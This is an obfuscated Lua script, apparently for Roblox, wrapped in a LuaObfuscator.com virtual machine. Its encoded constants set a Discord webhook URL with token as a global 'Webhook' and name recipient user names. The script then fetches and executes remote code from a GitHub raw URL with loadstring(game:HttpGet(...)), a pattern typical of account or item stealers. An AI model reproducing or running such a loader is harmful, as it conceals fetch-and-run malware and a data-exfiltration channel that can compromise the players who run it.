--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v90=v5(v84,v19);v19=nil;return v90;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + 1 + 0)) ;return v85-(v85%(620 -(555 + 64))) ;else local v86=((147 + 786) -(857 + 74))^(v32-(878 -(282 + 595))) ;return (((v31%(v86 + v86))>=v86) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + (2 -0) ;return (v36 * 256) + v35 ;end local function v23()local v37=1065 -(68 + (1954 -(892 + 65))) ;local v38;local v39;local v40;local v41;while true do if (v37==(1271 -(226 + 1044))) then return (v41 * 16777216) + (v40 * 65536) + (v39 * (1114 -858)) + v38 ;end if (v37==(117 -(32 + 85))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;v37=1;end end end local function v24()local v42=(0 + 0) -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(5 -2)) then if (v47==(0 -0)) then if (v46==(350 -(87 + 263))) then return v48 * (180 -(67 + 113)) ;else v47=1 -0 ;v45=0 + (0 -0) ;end elseif (v47==(5025 -2978)) then return ((v46==((2808 -2017) -(368 + 423))) and (v48 * (1/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/((7 -5)^(206 -154)))) ;end if (v42==(442 -(416 + 26))) then v43=v23();v44=v23();v42=3 -2 ;end if (v42==(1 + (860 -(814 + 45)))) then v47=v20(v44,21,54 -23 );v48=((v20(v44,470 -(145 + (721 -428)) )==(953 -(802 + 150))) and  -1) or (2 -1) ;v42=(1 + 4) -2 ;end if (v42==(1 + 0)) then v45=(353 + 645) -(915 + 82) ;v46=(v20(v44,2 -1 ,17 + 3 ) * ((774 -(201 + 571))^(19 + 13))) + v43 ;v42=8 -6 ;end end end local function v25(v49)local v50;if  not v49 then local v87=885 -(261 + 624) ;while true do if (v87==(0 -0)) then v49=v23();if (v49==(1423 -(630 + 793))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=1081 -(1020 + 60) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(168 -(122 + 44))) then v57=nil;v58=nil;v52=3;end if (4~=v52) then else while true do if (v53~=(0 -0)) then else local v97=0 -0 ;local v98;while true do if (v97~=(0 + 0)) then else v98=0 + 0 ;while true do if (1==v98) then v53=1;break;end if ((0 -0)==v98) then local v116=65 -(30 + 35) ;while true do if (v116==0) then v54=0;v55=nil;v116=1 + 0 ;end if ((1258 -(1043 + 214))==v116) then v98=1;break;end end end end break;end end end if ((3 -2)~=v53) then else local v99=0;while true do if (v99==0) then v56=nil;v57=nil;v99=1;end if (v99==(1213 -(323 + 889))) then v53=5 -3 ;break;end end end if (v53~=(583 -(361 + 219))) then else v60=nil;while true do local v100=0;local v101;local v102;while true do if (1==v100) then while true do if (v101==0) then v102=320 -(53 + 267) ;while true do if ((0 + 0)~=v102) then else local v167=413 -(15 + 398) ;while true do if (v167==(982 -(18 + 964))) then if (0==v54) then local v175=0;while true do if (v175==2) then v54=1;break;end if (v175~=(0 -0)) then else local v178=0;while true do if (v178~=1) then else v175=1;break;end if (v178~=0) then else v55={};v56={};v178=1;end end end if (v175==(1 + 0)) then local v179=0 + 0 ;local v180;while true do if (v179~=0) then else v180=850 -(20 + 830) ;while true do if (v180==0) then local v193=0 + 0 ;while true do if (v193==(127 -(116 + 10))) then v180=1 + 0 ;break;end if (0==v193) then v57={};v58={v55,v56,nil,v57};v193=1 + 0 ;end end end if (v180==1) then v175=4 -2 ;break;end end break;end end end end end if (v54~=(2 -1)) then else local v176=0;local v177;while true do if (0==v176) then v177=0;while true do if (v177==(1553 -(1126 + 425))) then v54=407 -(118 + 287) ;break;end if (v177==1) then local v182=0 -0 ;local v183;while true do if (v182==(1121 -(118 + 1003))) then v183=0 -0 ;while true do if (v183==0) then local v195=0;while true do if (v195==1) then v183=378 -(142 + 235) ;break;end if (v195==0) then for v198=4 -3 ,v59 do local v199=0;local v200;local v201;while true do if (v199==(1 + 0)) then if (v200==(978 -(553 + 424))) then v201=v21()~=(0 -0) ;elseif (v200==2) then v201=v24();elseif (v200~=3) then else v201=v25();end v60[v198]=v201;break;end if ((0 + 0)~=v199) then else local v205=0 + 0 ;local v206;while true do if (v205~=(0 + 0)) then else v206=0;while true do if (v206~=(0 + 0)) then else v200=v21();v201=nil;v206=1 + 0 ;end if (1==v206) then v199=2 -1 ;break;end end break;end end end end end v58[3]=v21();v195=2 -1 ;end end end if (v183==(2 -1)) then v177=1 + 1 ;break;end end break;end end end if (v177==0) then local v184=0;while true do if (v184==(0 -0)) then local v194=0;while true do if ((753 -(239 + 514))==v194) then v59=v23();v60={};v194=1 + 0 ;end if (1~=v194) then else v184=1330 -(797 + 532) ;break;end end end if (v184==1) then v177=1 + 0 ;break;end end end end break;end end end v167=1 + 0 ;end if (v167~=(2 -1)) then else v102=1;break;end end end if (v102~=(1203 -(373 + 829))) then else if (2~=v54) then else local v171=731 -(476 + 255) ;while true do local v172=0;while true do if (0==v172) then if (v171==(1131 -(369 + 761))) then return v58;end if (v171==0) then local v181=0 + 0 ;while true do if (v181==(0 -0)) then for v185=1,v23() do local v186=0 -0 ;local v187;local v188;local v189;local v190;while true do if (v186==1) then v189=nil;v190=nil;v186=240 -(64 + 174) ;end if (v186==2) then while true do if (v187~=(0 + 0)) then else local v196=0;while true do if (v196==0) then v188=0 -0 ;v189=nil;v196=337 -(144 + 192) ;end if (v196~=(217 -(42 + 174))) then else v187=1 + 0 ;break;end end end if (v187==(1 + 0)) then v190=nil;while true do if (0~=v188) then else local v202=0;local v203;while true do if (v202~=(0 + 0)) then else v203=1504 -(363 + 1141) ;while true do if (0==v203) then local v213=0;while true do if (v213==(1581 -(1183 + 397))) then v203=1;break;end if (v213==(0 -0)) then v189=0 + 0 ;v190=nil;v213=1;end end end if (v203==(1 + 0)) then v188=1976 -(1913 + 62) ;break;end end break;end end end if (1==v188) then while true do if (v189~=(0 + 0)) then else v190=v21();if (v20(v190,1,2 -1 )==0) then local v207=1933 -(565 + 1368) ;local v208;local v209;local v210;local v211;local v212;while true do if (v207==(7 -5)) then v212=nil;while true do if ((1662 -(1477 + 184))~=v208) then else local v214=0;while true do if (v214~=(0 -0)) then else v211=nil;v212=nil;v214=1 + 0 ;end if (v214==(857 -(564 + 292))) then v208=2;break;end end end if (v208==(2 -0)) then while true do if (v209==(0 -0)) then local v216=304 -(244 + 60) ;while true do if (v216==(0 + 0)) then v210=v20(v190,478 -(41 + 435) ,3);v211=v20(v190,1005 -(938 + 63) ,5 + 1 );v216=1;end if (v216~=(1126 -(936 + 189))) then else v209=1 + 0 ;break;end end end if (v209~=3) then else if (v20(v211,1616 -(1565 + 48) ,2 + 1 )~=1) then else v212[1142 -(782 + 356) ]=v60[v212[271 -(176 + 91) ]];end v55[v185]=v212;break;end if (v209==2) then local v218=0 -0 ;local v219;while true do if (v218~=(0 -0)) then else v219=1092 -(975 + 117) ;while true do if ((1875 -(157 + 1718))==v219) then if (v20(v211,1 + 0 ,1)~=1) then else v212[6 -4 ]=v60[v212[6 -4 ]];end if (v20(v211,2,1020 -(697 + 321) )==1) then v212[7 -4 ]=v60[v212[3]];end v219=1 -0 ;end if (v219~=(2 -1)) then else v209=3;break;end end break;end end end if (1==v209) then local v220=0 + 0 ;local v221;while true do if (v220~=0) then else v221=0;while true do if (v221==(0 -0)) then local v224=0 -0 ;while true do if (v224==0) then v212={v22(),v22(),nil,nil};if (v210==(872 -(826 + 46))) then local v229=947 -(245 + 702) ;local v230;local v231;while true do if (v229==0) then v230=0 -0 ;v231=nil;v229=1 + 0 ;end if (v229==(1899 -(260 + 1638))) then while true do if (v230~=(440 -(382 + 58))) then else v231=0;while true do if (v231~=(0 -0)) then else v212[3 + 0 ]=v22();v212[4]=v22();break;end end break;end end break;end end elseif (v210==(1 -0)) then v212[8 -5 ]=v23();elseif (v210==(1207 -(902 + 303))) then v212[3]=v23() -(2^16) ;elseif (v210==3) then local v234=0;local v235;local v236;while true do if (v234==(1 -0)) then while true do if (v235==(0 -0)) then v236=0 + 0 ;while true do if (v236==0) then v212[1693 -(1121 + 569) ]=v23() -(2^(230 -(22 + 192))) ;v212[4]=v22();break;end end break;end end break;end if (v234==0) then local v239=0;while true do if (1==v239) then v234=1;break;end if (v239==(683 -(483 + 200))) then v235=1463 -(1404 + 59) ;v236=nil;v239=2 -1 ;end end end end end v224=1 -0 ;end if (v224~=1) then else v221=1;break;end end end if (v221~=(766 -(468 + 297))) then else v209=2;break;end end break;end end end end break;end if (v208==(562 -(334 + 228))) then local v215=0 -0 ;while true do if (v215==(0 -0)) then v209=0 -0 ;v210=nil;v215=1;end if (1==v215) then v208=1;break;end end end end break;end if (v207==(1 + 0)) then v210=nil;v211=nil;v207=2;end if (v207~=0) then else v208=0;v209=nil;v207=237 -(141 + 95) ;end end end break;end end break;end end break;end end break;end if (0~=v186) then else v187=0;v188=nil;v186=1 + 0 ;end end end for v191=2 -1 ,v23() do v56[v191-(2 -1) ]=v28();end v181=1;end if (v181==1) then v171=1;break;end end end break;end end end end break;end end break;end end break;end if (v100==(0 + 0)) then v101=0;v102=nil;v100=1;end end end break;end if (2==v53) then v58=nil;v59=nil;v53=3;end end break;end if (v52~=1) then else v55=nil;v56=nil;v52=5 -3 ;end if (v52==3) then v59=nil;v60=nil;v52=3 + 1 ;end if (v52==0) then v53=0 + 0 ;v54=nil;v52=1 -0 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]][v81[3]]=v81[4];elseif (v82>1) then do return;end else v79[v81[2]]();end elseif (v82<=3) then local v105=0;local v106;local v107;local v108;local v109;local v110;while true do if (v105==3) then v81=v69[v73];v110=v81[2];v109=v79[v81[3]];v79[v110 + 1 ]=v109;v105=4;end if (v105==4) then v79[v110]=v109[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v105=5;end if (v105==5) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v105=6;end if (v105==9) then v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];break;end if (v105==7) then v106=0;for v163=v110,v74 do v106=v106 + 1 ;v79[v163]=v107[v106];end v73=v73 + 1 ;v81=v69[v73];v105=8;end if (v105==6) then v81=v69[v73];v110=v81[2];v107,v108=v72(v79[v110](v13(v79,v110 + 1 ,v81[3])));v74=(v108 + v110) -1 ;v105=7;end if (v105==0) then v106=nil;v107,v108=nil;v109=nil;v110=nil;v105=1;end if (v105==8) then v110=v81[2];v79[v110]=v79[v110](v13(v79,v110 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v105=9;end if (v105==1) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v105=2;end if (v105==2) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v105=3;end end elseif (v82==4) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else local v123=v81[2];v79[v123]=v79[v123](v13(v79,v123 + 1 ,v74));end elseif (v82<=8) then if (v82<=6) then local v111=v81[2];local v112=v79[v81[3]];v79[v111 + 1 ]=v112;v79[v111]=v112[v81[4]];elseif (v82>7) then local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==1) then v74=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v81[2];v127,v128=v72(v79[v126](v13(v79,v126 + 1 ,v81[3])));v125=1;end if (2==v125) then for v169=v126,v74 do local v170=0;while true do if (v170==0) then v129=v129 + 1 ;v79[v169]=v127[v129];break;end end end break;end end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=10) then if (v82==9) then v79[v81[2]]=v63[v81[3]];else v79[v81[2]]=v81[3]~=0 ;end elseif (v82==11) then v79[v81[2]]=v81[3];else v73=v81[3];end v73=v73 + 1 ;break;end if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31303938333837323738343633383031322F6C49324F6776504147613130694C4F69506B78453349512D474F323841466349383365756E495A6E2O34412D44483166542O7A764779744C456E58485048574C536E4945030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503073O004272617964656E03093O00557365724E616D653200173O00120B3O00013O0026073O000E0001000200040C3O000E0001001209000100033O00300300010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026073O00010001000100040C3O00010001001209000100033O0030040001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00023O00017O00",v9(),...);end
